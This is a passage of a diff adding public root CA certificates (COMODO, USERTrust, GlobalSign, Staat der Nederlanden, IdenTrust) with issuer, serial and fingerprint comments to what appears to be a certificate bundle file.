+ithZwuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1If
+xp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDV
+ySAdYyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiO
+DCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQ
+jdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/
+CNdaSaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCi
+EhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADM
+fRyVw4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QY
+uKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXK
+chYiCd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t
+9dmpsh3lGwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB
+hjAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5nP+e6mK4cD08wDQYJKoZIhvcNAQEMBQAD
+ggIBALth2X2pbL4XxJEbw6GiAI3jZGgPVs93rnD5/ZpKmbnJeFwMDF/k5hQpVgs2
+SV1EY+CtnJYYZhsjDT156W1r1lT40jzBQ0CuHVD1UvyQO7uYmWlrx8GnqGikJ9yd
++SeuMIW59mdNOj6PWTkiU0TryF0Dyu1Qen1iIQqAyHNm0aAFYF/opbSnr6j3bTWc
+fFqK1qI4mfN4i/RN0iAL3gTujJtHgXINwBQy7zBZLq7gcfJW5GqXb5JQbZaNaHqa
+sjYUegbyJLkJEVDXCLG4iXqEI2FCKeWjzaIgQdfRnGTZ6iahixTXTBmyUEFxPT9N
+cCOGDErcgdLMMpSEDQgJlxxPwO5rIHQw0uA5NBCFIRUBCOhVMt5xSdkoF1BN5r5N
+0XWs0Mr7QbhDparTwwVETyw2m+L64kW4I1NsBm9nVX9GtUw/bihaeSbSpKhil9Ie
+4u1Ki7wb/UdKDd9nZn6yW0HQO+T0O/QEY+nvwlQAUaCKKsnOeMzV6ocEGLPOr0mI
+r/OSmbaz5mEP0oUA51Aa5BuVnRmhuZyxm7EAHu/QD09CbMkKvO5D+jpxpchNJqU1
+/YldvIViHTLSoCtU7ZpXwdv6EM8Zt4tKG48BtieVU+i2iW1bvGjUI+iLUaJW+fCm
+gKDWHrO8Dw9TdSmq6hN35N6MgSGtBxBHEa2HPQfRdbzP82Z+
+-----END CERTIFICATE-----
+
+# Issuer: CN=COMODO RSA Certification Authority O=COMODO CA Limited
+# Subject: CN=COMODO RSA Certification Authority O=COMODO CA Limited
+# Label: "COMODO RSA Certification Authority"
+# Serial: 101909084537582093308941363524873193117
+# MD5 Fingerprint: 1b:31:b0:71:40:36:cc:14:36:91:ad:c4:3e:fd:ec:18
+# SHA1 Fingerprint: af:e5:d2:44:a8:d1:19:42:30:ff:47:9f:e2:f8:97:bb:cd:7a:8c:b4
+# SHA256 Fingerprint: 52:f0:e1:c4:e5:8e:c6:29:29:1b:60:31:7f:07:46:71:b8:5d:7e:a8:0d:5b:07:27:34:63:53:4b:32:b4:02:34
+-----BEGIN CERTIFICATE-----
+MIIF2DCCA8CgAwIBAgIQTKr5yttjb+Af907YWwOGnTANBgkqhkiG9w0BAQwFADCB
+hTELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxKzApBgNV
+BAMTIkNPTU9ETyBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAwMTE5
+MDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBhTELMAkGA1UEBhMCR0IxGzAZBgNVBAgT
+EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEaMBgGA1UEChMR
+Q09NT0RPIENBIExpbWl0ZWQxKzApBgNVBAMTIkNPTU9ETyBSU0EgQ2VydGlmaWNh
+dGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCR
+6FSS0gpWsawNJN3Fz0RndJkrN6N9I3AAcbxT38T6KhKPS38QVr2fcHK3YX/JSw8X
+pz3jsARh7v8Rl8f0hj4K+j5c+ZPmNHrZFGvnnLOFoIJ6dq9xkNfs/Q36nGz637CC
+9BR++b7Epi9Pf5l/tfxnQ3K9DADWietrLNPtj5gcFKt+5eNu/Nio5JIk2kNrYrhV
+/erBvGy2i/MOjZrkm2xpmfh4SDBF1a3hDTxFYPwyllEnvGfDyi62a+pGx8cgoLEf
+Zd5ICLqkTqnyg0Y3hOvozIFIQ2dOciqbXL1MGyiKXCJ7tKuY2e7gUYPDCUZObT6Z
++pUX2nwzV0E8jVHtC7ZcryxjGt9XyD+86V3Em69FmeKjWiS0uqlWPc9vqv9JWL7w
+qP/0uK3pN/u6uPQLOvnoQ0IeidiEyxPx2bvhiWC4jChWrBQdnArncevPDt09qZah
+SL0896+1DSJMwBGB7FY79tOi4lu3sgQiUpWAk2nojkxl8ZEDLXB0AuqLZxUpaVIC
+u9ffUGpVRr+goyhhf3DQw6KqLCGqR84onAZFdr+CGCe01a60y1Dma/RMhnEw6abf
+Fobg2P9A3fvQQoh/ozM6LlweQRGBY84YcWsr7KaKtzFcOmpH4MN5WdYgGq/yapiq
+crxXStJLnbsQ/LBMQeXtHT1eKJ2czL+zUdqnR+WEUwIDAQABo0IwQDAdBgNVHQ4E
+FgQUu69+Aj36pvE8hI6t7jiY7NkyMtQwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB
+/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAArx1UaEt65Ru2yyTUEUAJNMnMvl
+wFTPoCWOAvn9sKIN9SCYPBMtrFaisNZ+EZLpLrqeLppysb0ZRGxhNaKatBYSaVqM
+4dc+pBroLwP0rmEdEBsqpIt6xf4FpuHA1sj+nq6PK7o9mfjYcwlYRm6mnPTXJ9OV
+2jeDchzTc+CiR5kDOF3VSXkAKRzH7JsgHAckaVd4sjn8OoSgtZx8jb8uk2Intzna
+FxiuvTwJaP+EmzzV1gsD41eeFPfR60/IvYcjt7ZJQ3mFXLrrkguhxuhoqEwWsRqZ
+CuhTLJK7oQkYdQxlqHvLI7cawiiFwxv/0Cti76R7CZGYZ4wUAc1oBmpjIXUDgIiK
+boHGhfKppC3n9KUkEEeDys30jXlYsQab5xoq2Z0B15R97QNKyvDb6KkBPvVWmcke
+jkk9u+UJueBPSZI9FoJAzMxZxuY67RIuaTxslbH9qh17f4a+Hg4yRvv7E491f0yL
+S0Zj/gA0QHDBw7mh3aZw4gSzQbzpgJHqZJx64SIDqZxubw5lT2yHh17zbqD5daWb
+QOhTsiedSrnAdyGN/4fy3ryM7xfft0kL0fJuMAsaDk527RH89elWsn2/x20Kk4yl
+0MC2Hb46TpSi125sC8KKfPog88Tk5c0NqMuRkrF8hey1FGlmDoLnzc7ILaZRfyHB
+NVOFBkpdn627G190
+-----END CERTIFICATE-----
+
+# Issuer: CN=USERTrust RSA Certification Authority O=The USERTRUST Network
+# Subject: CN=USERTrust RSA Certification Authority O=The USERTRUST Network
+# Label: "USERTrust RSA Certification Authority"
+# Serial: 2645093764781058787591871645665788717
+# MD5 Fingerprint: 1b:fe:69:d1:91:b7:19:33:a3:72:a8:0f:e1:55:e5:b5
+# SHA1 Fingerprint: 2b:8f:1b:57:33:0d:bb:a2:d0:7a:6c:51:f7:0e:e9:0d:da:b9:ad:8e
+# SHA256 Fingerprint: e7:93:c9:b0:2f:d8:aa:13:e2:1c:31:22:8a:cc:b0:81:19:64:3b:74:9c:89:89:64:b1:74:6d:46:c3:d4:cb:d2
+-----BEGIN CERTIFICATE-----
+MIIF3jCCA8agAwIBAgIQAf1tMPyjylGoG7xkDjUDLTANBgkqhkiG9w0BAQwFADCB
+iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0pl
+cnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNV
+BAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAw
+MjAxMDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNV
+BAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVU
+aGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2Vy
+dGlmaWNhdGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK
+AoICAQCAEmUXNg7D2wiz0KxXDXbtzSfTTK1Qg2HiqiBNCS1kCdzOiZ/MPans9s/B
+3PHTsdZ7NygRK0faOca8Ohm0X6a9fZ2jY0K2dvKpOyuR+OJv0OwWIJAJPuLodMkY
+tJHUYmTbf6MG8YgYapAiPLz+E/CHFHv25B+O1ORRxhFnRghRy4YUVD+8M/5+bJz/
+Fp0YvVGONaanZshyZ9shZrHUm3gDwFA66Mzw3LyeTP6vBZY1H1dat//O+T23LLb2
+VN3I5xI6Ta5MirdcmrS3ID3KfyI0rn47aGYBROcBTkZTmzNg95S+UzeQc0PzMsNT
+79uq/nROacdrjGCT3sTHDN/hMq7MkztReJVni+49Vv4M0GkPGw/zJSZrM233bkf6
+c0Plfg6lZrEpfDKEY1WJxA3Bk1QwGROs0303p+tdOmw1XNtB1xLaqUkL39iAigmT
+Yo61Zs8liM2EuLE/pDkP2QKe6xJMlXzzawWpXhaDzLhn4ugTncxbgtNMs+1b/97l
+c6wjOy0AvzVVdAlJ2ElYGn+SNuZRkg7zJn0cTRe8yexDJtC/QV9AqURE9JnnV4ee
+UB9XVKg+/XRjL7FQZQnmWEIuQxpMtPAlR1n6BB6T1CZGSlCBst6+eLf8ZxXhyVeE
+Hg9j1uliutZfVS7qXMYoCAQlObgOK6nyTJccBz8NUvXt7y+CDwIDAQABo0IwQDAd
+BgNVHQ4EFgQUU3m/WqorSs9UgOHYm8Cd8rIDZsswDgYDVR0PAQH/BAQDAgEGMA8G
+A1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAFzUfA3P9wF9QZllDHPF
+Up/L+M+ZBn8b2kMVn54CVVeWFPFSPCeHlCjtHzoBN6J2/FNQwISbxmtOuowhT6KO
+VWKR82kV2LyI48SqC/3vqOlLVSoGIG1VeCkZ7l8wXEskEVX/JJpuXior7gtNn3/3
+ATiUFJVDBwn7YKnuHKsSjKCaXqeYalltiz8I+8jRRa8YFWSQEg9zKC7F4iRO/Fjs
+8PRF/iKz6y+O0tlFYQXBl2+odnKPi4w2r78NBc5xjeambx9spnFixdjQg3IM8WcR
+iQycE0xyNN+81XHfqnHd4blsjDwSXWXavVcStkNr/+XeTWYRUc+ZruwXtuhxkYze
+Sf7dNXGiFSeUHM9h4ya7b6NnJSFd5t0dCy5oGzuCr+yDZ4XUmFF0sbmZgIn/f3gZ
+XHlKYC6SQK5MNyosycdiyA5d9zZbyuAlJQG03RoHnHcAP9Dc1ew91Pq7P8yF1m9/
+qS3fuQL39ZeatTXaw2ewh0qpKJ4jjv9cJ2vhsE/zB+4ALtRZh8tSQZXq9EfX7mRB
+VXyNWQKV3WKdwrnuWih0hKWbt5DHDAff9Yk2dDLWKMGwsAvgnEzDHNb842m1R0aB
+L6KCq9NjRHDEjf8tM7qtj3u1cIiuPhnPQCjY/MiQu12ZIvVS5ljFH4gxQ+6IHdfG
+jjxDah2nGN59PRbxYvnKkKj9
+-----END CERTIFICATE-----
+
+# Issuer: CN=USERTrust ECC Certification Authority O=The USERTRUST Network
+# Subject: CN=USERTrust ECC Certification Authority O=The USERTRUST Network
+# Label: "USERTrust ECC Certification Authority"
+# Serial: 123013823720199481456569720443997572134
+# MD5 Fingerprint: fa:68:bc:d9:b5:7f:ad:fd:c9:1d:06:83:28:cc:24:c1
+# SHA1 Fingerprint: d1:cb:ca:5d:b2:d5:2a:7f:69:3b:67:4d:e5:f0:5a:1d:0c:95:7d:f0
+# SHA256 Fingerprint: 4f:f4:60:d5:4b:9c:86:da:bf:bc:fc:57:12:e0:40:0d:2b:ed:3f:bc:4d:4f:bd:aa:86:e0:6a:dc:d2:a9:ad:7a
+-----BEGIN CERTIFICATE-----
+MIICjzCCAhWgAwIBAgIQXIuZxVqUxdJxVt7NiYDMJjAKBggqhkjOPQQDAzCBiDEL
+MAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNl
+eSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMT
+JVVTRVJUcnVzdCBFQ0MgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAwMjAx
+MDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
+Ck5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUg
+VVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBFQ0MgQ2VydGlm
+aWNhdGlvbiBBdXRob3JpdHkwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQarFRaqflo
+I+d61SRvU8Za2EurxtW20eZzca7dnNYMYf3boIkDuAUU7FfO7l0/4iGzzvfUinng
+o4N+LZfQYcTxmdwlkWOrfzCjtHDix6EznPO/LlxTsV+zfTJ/ijTjeXmjQjBAMB0G
+A1UdDgQWBBQ64QmG1M8ZwpZ2dEl23OA1xmNjmjAOBgNVHQ8BAf8EBAMCAQYwDwYD
+VR0TAQH/BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjA2Z6EWCNzklwBBHU6+4WMB
+zzuqQhFkoJ2UOQIReVx7Hfpkue4WQrO/isIJxOzksU0CMQDpKmFHjFJKS04YcPbW
+RNZu9YO6bVi9JNlWSOrvxKJGgYhqOkbRqZtNyWHa0V1Xahg=
+-----END CERTIFICATE-----
+
+# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R5
+# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R5
+# Label: "GlobalSign ECC Root CA - R5"
+# Serial: 32785792099990507226680698011560947931244
+# MD5 Fingerprint: 9f:ad:3b:1c:02:1e:8a:ba:17:74:38:81:0c:a2:bc:08
+# SHA1 Fingerprint: 1f:24:c6:30:cd:a4:18:ef:20:69:ff:ad:4f:dd:5f:46:3a:1b:69:aa
+# SHA256 Fingerprint: 17:9f:bc:14:8a:3d:d0:0f:d2:4e:a1:34:58:cc:43:bf:a7:f5:9c:81:82:d7:83:a5:13:f6:eb:ec:10:0c:89:24
+-----BEGIN CERTIFICATE-----
+MIICHjCCAaSgAwIBAgIRYFlJ4CYuu1X5CneKcflK2GwwCgYIKoZIzj0EAwMwUDEk
+MCIGA1UECxMbR2xvYmFsU2lnbiBFQ0MgUm9vdCBDQSAtIFI1MRMwEQYDVQQKEwpH
+bG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWduMB4XDTEyMTExMzAwMDAwMFoX
+DTM4MDExOTAzMTQwN1owUDEkMCIGA1UECxMbR2xvYmFsU2lnbiBFQ0MgUm9vdCBD
+QSAtIFI1MRMwEQYDVQQKEwpHbG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWdu
+MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAER0UOlvt9Xb/pOdEh+J8LttV7HpI6SFkc
+8GIxLcB6KP4ap1yztsyX50XUWPrRd21DosCHZTQKH3rd6zwzocWdTaRvQZU4f8ke
+hOvRnkmSh5SHDDqFSmafnVmTTZdhBoZKo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYD
+VR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUPeYpSJvqB8ohREom3m7e0oPQn1kwCgYI
+KoZIzj0EAwMDaAAwZQIxAOVpEslu28YxuglB4Zf4+/2a4n0Sye18ZNPLBSWLVtmg
+515dTguDnFt2KaAJJiFqYgIwcdK1j1zqO+F4CYWodZI7yFz9SO8NdCKoCOJuxUnO
+xwy8p2Fp8fc74SrL+SvzZpA3
+-----END CERTIFICATE-----
+
+# Issuer: CN=Staat der Nederlanden EV Root CA O=Staat der Nederlanden
+# Subject: CN=Staat der Nederlanden EV Root CA O=Staat der Nederlanden
+# Label: "Staat der Nederlanden EV Root CA"
+# Serial: 10000013
+# MD5 Fingerprint: fc:06:af:7b:e8:1a:f1:9a:b4:e8:d2:70:1f:c0:f5:ba
+# SHA1 Fingerprint: 76:e2:7e:c1:4f:db:82:c1:c0:a6:75:b5:05:be:3d:29:b4:ed:db:bb
+# SHA256 Fingerprint: 4d:24:91:41:4c:fe:95:67:46:ec:4c:ef:a6:cf:6f:72:e2:8a:13:29:43:2f:9d:8a:90:7a:c4:cb:5d:ad:c1:5a
+-----BEGIN CERTIFICATE-----
+MIIFcDCCA1igAwIBAgIEAJiWjTANBgkqhkiG9w0BAQsFADBYMQswCQYDVQQGEwJO
+TDEeMBwGA1UECgwVU3RhYXQgZGVyIE5lZGVybGFuZGVuMSkwJwYDVQQDDCBTdGFh
+dCBkZXIgTmVkZXJsYW5kZW4gRVYgUm9vdCBDQTAeFw0xMDEyMDgxMTE5MjlaFw0y
+MjEyMDgxMTEwMjhaMFgxCzAJBgNVBAYTAk5MMR4wHAYDVQQKDBVTdGFhdCBkZXIg
+TmVkZXJsYW5kZW4xKTAnBgNVBAMMIFN0YWF0IGRlciBOZWRlcmxhbmRlbiBFViBS
+b290IENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA48d+ifkkSzrS
+M4M1LGns3Amk41GoJSt5uAg94JG6hIXGhaTK5skuU6TJJB79VWZxXSzFYGgEt9nC
+UiY4iKTWO0Cmws0/zZiTs1QUWJZV1VD+hq2kY39ch/aO5ieSZxeSAgMs3NZmdO3d
+Z//BYY1jTw+bbRcwJu+r0h8QoPnFfxZpgQNH7R5ojXKhTbImxrpsX23Wr9GxE46p
+rfNeaXUmGD5BKyF/7otdBwadQ8QpCiv8Kj6GyzyDOvnJDdrFmeK8eEEzduG/L13l
+pJhQDBXd4Pqcfzho0LKmeqfRMb1+ilgnQ7O6M5HTp5gVXJrm0w912fxBmJc+qiXb
+j5IusHsMX/FjqTf5m3VpTCgmJdrV8hJwRVXj33NeN/UhbJCONVrJ0yPr08C+eKxC
+KFhmpUZtcALXEPlLVPxdhkqHz3/KRawRWrUgUY0viEeXOcDPusBCAUCZSCELa6fS
+/ZbV0b5GnUngC6agIk440ME8MLxwjyx1zNDFjFE7PZQIZCZhfbnDZY8UnCHQqv0X
+cgOPvZuM5l5Tnrmd74K74bzickFbIZTTRTeU0d8JOV3nI6qaHcptqAqGhYqCvkIH
+1vI4gnPah1vlPNOePqc7nvQDs/nxfRN0Av+7oeX6AHkcpmZBiFxgV6YuCcS6/ZrP
+px9Aw7vMWgpVSzs4dlG4Y4uElBbmVvMCAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB
+/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFP6rAJCYniT8qcwaivsnuL8wbqg7
+MA0GCSqGSIb3DQEBCwUAA4ICAQDPdyxuVr5Os7aEAJSrR8kN0nbHhp8dB9O2tLsI
+eK9p0gtJ3jPFrK3CiAJ9Brc1AsFgyb/E6JTe1NOpEyVa/m6irn0F3H3zbPB+po3u
+2dfOWBfoqSmuc0iH55vKbimhZF8ZE/euBhD/UcabTVUlT5OZEAFTdfETzsemQUHS
+v4ilf0X8rLiltTMMgsT7B/Zq5SWEXwbKwYY5EdtYzXc7LMJMD16a4/CrPmEbUCTC
+wPTxGfARKbalGAKb12NMcIxHowNDXLldRqANb/9Zjr7dn3LDWyvfjFvO5QxGbJKy
+CqNMVEIYFRIYvdr8unRu/8G2oGTYqV9Vrp9canaW2HNnh/tNf1zuacpzEPuKqf2e
+vTY4SUmH9A4U8OmHuD+nT3pajnnUk+S7aFKErGzp85hwVXIy+TSrK0m1zSBi5Dp6
+Z2Orltxtrpfs/J92VoguZs9btsmksNcFuuEnL5O7Jiqik7Ab846+HUCjuTaPPoIa
+Gl6I6lD4WeKDRikL40Rc4ZW2aZCaFG+XroHPaO+Zmr615+F/+PoTRxZMzG0IQOeL
+eG9QgkRQP2YGiqtDhFZKDyAthg710tvSeopLzaXoTvFeJiUBWSOgftL2fiFX1ye8
+FVdMpEbB4IMeDExNH08GGeL5qPQ6gqGyeUN51q1veieQA6TqJIc/2b3Z6fJfUEkc
+7uzXLg==
+-----END CERTIFICATE-----
+
+# Issuer: CN=IdenTrust Commercial Root CA 1 O=IdenTrust
+# Subject: CN=IdenTrust Commercial Root CA 1 O=IdenTrust
+# Label: "IdenTrust Commercial Root CA 1"
+# Serial: 13298821034946342390520003877796839426
+# MD5 Fingerprint: b3:3e:77:73:75:ee:a0:d3:e3:7e:49:63:49:59:bb:c7
+# SHA1 Fingerprint: df:71:7e:aa:4a:d9:4e:c9:55:84:99:60:2d:48:de:5f:bc:f0:3a:25
+# SHA256 Fingerprint: 5d:56:49:9b:e4:d2:e0:8b:cf:ca:d0:8a:3e:38:72:3d:50:50:3b:de:70:69:48:e4:2f:55:60:30:19:e5:28:ae
+-----BEGIN CERTIFICATE-----
+MIIFYDCCA0igAwIBAgIQCgFCgAAAAUUjyES1AAAAAjANBgkqhkiG9w0BAQsFADBK
+MQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MScwJQYDVQQDEx5JZGVu
+VHJ1c3QgQ29tbWVyY2lhbCBSb290IENBIDEwHhcNMTQwMTE2MTgxMjIzWhcNMzQw
+MTE2MTgxMjIzWjBKMQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MScw
+JQYDVQQDEx5JZGVuVHJ1c3QgQ29tbWVyY2lhbCBSb290IENBIDEwggIiMA0GCSqG
+SIb3DQEBAQUAA4ICDwAwggIKAoICAQCnUBneP5k91DNG8W9RYYKyqU+PZ4ldhNlT
+3Qwo2dfw/66VQ3KZ+bVdfIrBQuExUHTRgQ18zZshq0PirK1ehm7zCYofWjK9ouuU
++ehcCuz/mNKvcbO0U59Oh++SvL3sTzIwiEsXXlfEU8L2ApeN2WIrvyQfYo3fw7gp
+S0l4PJNgiCL8mdo2yMKi1CxUAGc1bnO/AljwpN3lsKImesrgNqUZFvX9t++uP0D1
+bVoE/c40yiTcdCMbXTMTEl3EASX2MN0CXZ/g1Ue9tOsbobtJSdifWwLziuQkkORi
+T0/Br4sOdBeo0XKIanoBScy0RnnGF7HamB4HWfp1IYVl3ZBWzvurpWCdxJ35UrCL
+vYf5jysjCiN2O/cz4ckA82n5S6LgTrx+kzmEB/dEcH7+B1rlsazRGMzyNeVJSQjK
+Vsk9+w8YfYs7wRPCTY/JTw436R+hDmrfYi7LNQZReSzIJTj0+kuniVyc0uMNOYZK
+dHzVWYfCP04MXFL0PfdSgvHqo6z9STQaKPNBiDoT7uje/5kdX7rL6B7yuVBgwDHT
+c+XvvqDtMwt0viAgxGds8AgDelWAf0ZOlqf0Hj7h9tgJ4TNkK2PXMl6f+cB7D3hv
+l7yTmvmcEpB4eoCHFddydJxVdHixuuFucAS6T6C6aMN7/zHwcz09lCqxC0EOoP5N
+iGVreTO01wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB
+/zAdBgNVHQ4EFgQU7UQZwNPwBovupHu+QucmVMiONnYwDQYJKoZIhvcNAQELBQAD
+ggIBAA2ukDL2pkt8RHYZYR4nKM1eVO8lvOMIkPkp165oCOGUAFjvLi5+U1KMtlwH
+6oi6mYtQlNeCgN9hCQCTrQ0U5s7B8jeUeLBfnLOic7iPBZM4zY0+sLj7wM+x8uwt
+LRvM7Kqas6pgghstO8OEPVeKlh6cdbjTMM1gCIOQ045U8U1mwF10A0Cj7oV+wh93
+nAbowacYXVKV7cndJZ5t+qntozo00Fl72u1Q8zW/7esUTTHHYPTa8Yec4kjixsU3
++wYQ+nVZZjFHKdp2mhzpgq7vmrlR94gjmmmVYjzlVYA211QC//G5Xc7UI2/YRYRK
+W2XviQzdFKcgyxilJbQN+QHwotL0AMh0jqEqSI5l2xPE4iUXfeu+h1sXIFRRk0pT
+AwvsXcoz7WL9RccvW9xYoIA55vrX/hMUpu09lEpCdNTDd1lzzY9GvlU47/rokTLq
+l1gEIt44w8y8bckzOmoKaT+gyOpyj4xjhiO9bTyWnpXgSUyqorkqG5w2gXjtw+hG
+4iZZRHUe2XWJUc0QhJ1hYMtd+ZciTY6Y5uN/9lu7rs3KSoFrXgvzUeF0K+l+J6fZ
+mUlO+KWA2yUPHGNiiskzZ2s8EIPGrd6ozRaOjfAHN3Gf8qv8QfXBi+wAN10J5U6A
+7/qxXDgGpRtK4dw4LTzcqx+QGtVKnO7RcGzM7vRX+Bi6hG6H
+-----END CERTIFICATE-----
+
+# Issuer: CN=IdenTrust Public Sector Root CA 1 O=IdenTrust
+# Subject: CN=IdenTrust Public Sector Root CA 1 O=IdenTrust
+# Label: "IdenTrust Public Sector Root CA 1"
+# Serial: 13298821034946342390521976156843933698
+# MD5 Fingerprint: 37:06:a5:b0:fc:89:9d:ba:f4:6b:8c:1a:64:cd:d5:ba
+# SHA1 Fingerprint: ba:29:41:60:77:98:3f:f4:f3:ef:f2:31:05:3b:2e:ea:6d:4d:45:fd
+# SHA256 Fingerprint: 30:d0:89:5a:9a:44:8a:26:20:91:63:55:22:d1:f5:20:10:b5:86:7a:ca:e1:2c:78:ef:95:8f:d4:f4:38:9f:2f
+-----BEGIN CERTIFICATE-----
+MIIFZjCCA06gAwIBAgIQCgFCgAAAAUUjz0Z8AAAAAjANBgkqhkiG9w0BAQsFADBN
+MQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0MSowKAYDVQQDEyFJZGVu
+VHJ1c3QgUHVibGljIFNlY3RvciBSb290IENBIDEwHhcNMTQwMTE2MTc1MzMyWhcN
+MzQwMTE2MTc1MzMyWjBNMQswCQYDVQQGEwJVUzESMBAGA1UEChMJSWRlblRydXN0
+MSowKAYDVQQDEyFJZGVuVHJ1c3QgUHVibGljIFNlY3RvciBSb290IENBIDEwggIi
+MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC2IpT8pEiv6EdrCvsnduTyP4o7
+ekosMSqMjbCpwzFrqHd2hCa2rIFCDQjrVVi7evi8ZX3yoG2LqEfpYnYeEe4IFNGy
+RBb06tD6Hi9e28tzQa68ALBKK0CyrOE7S8ItneShm+waOh7wCLPQ5CQ1B5+ctMlS
+bdsHyo+1W/CD80/HLaXIrcuVIKQxKFdYWuSNG5qrng0M8gozOSI5Cpcu81N3uURF
+/YTLNiCBWS2ab21ISGHKTN9T0a9SvESfqy9rg3LvdYDaBjMbXcjaY8ZNzaxmMc3R
+3j6HEDbhuaR672BQssvKplbgN6+rNBM5Jeg5ZuSYeqoSmJxZZoY+rfGwyj4GD3vw
+EUs3oERte8uojHH01bWRNszwFcYr3lEXsZdMUD2xlVl8BX0tIdUAvwFnol57plzy
+9yLxkA2T26pEUWbMfXYD62qoKjgZl3YNa4ph+bz27nb9cCvdKTz4Ch5bQhyLVi9V
+GxyhLrXHFub4qjySjmm2AcG1hp2JDws4lFTo6tyePSW8Uybt1as5qsVATFSrsrTZ
+2fjXctscvG29ZV/viDUqZi/u9rNl8DONfJhBaUYPQxxp+pu10GFqzcpL2UyQRqsV
+WaFHVCkugyhfHMKiq3IXAAaOReyL4jM9f9oZRORicsPfIsbyVtTdX5Vy7W1f90gD
+W/3FKqD2cyOEEBsB5wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/
+BAUwAwEB/zAdBgNVHQ4EFgQU43HgntinQtnbcZFrlJPrw6PRFKMwDQYJKoZIhvcN
+AQELBQADggIBAEf63QqwEZE4rU1d9+UOl1QZgkiHVIyqZJnYWv6IAcVYpZmxI1Qj
+t2odIFflAWJBF9MJ23XLblSQdf4an4EKwt3X9wnQW3IV5B4Jaj0z8yGa5hV+rVHV
+DRDtfULAj+7AmgjVQdZcDiFpboBhDhXAuM/FSRJSzL46zNQuOAXeNf0fb7iAaJg9
+TaDKQGXSc3z1i9kKlT/YPyNtGtEqJBnZhbMX73huqVjRI9PHE+1yJX9dsXNw0H8G
+lwmEKYBhHfpe/3OsoOOJuBxxFcbeMX8S3OFtm6/n6J91eEyrRjuazr8FGF1NFTwW
+mhlQBJqymm9li1JfPFgEKCXAZmExfrngdbkaqIHWchezxQMxNRF4eKLg6TCMf4Df
+WN88uieW4oA0beOY02QnrEh+KHdcxiVhJfiFDGX6xDIvpZgF5PgLZxYWxoK4Mhn5
++bl53B/N66+rDt0b20XkeucC4pVd/GnwU2lhlXV5C15V5jgclKlZM57IcXR5f1GJ
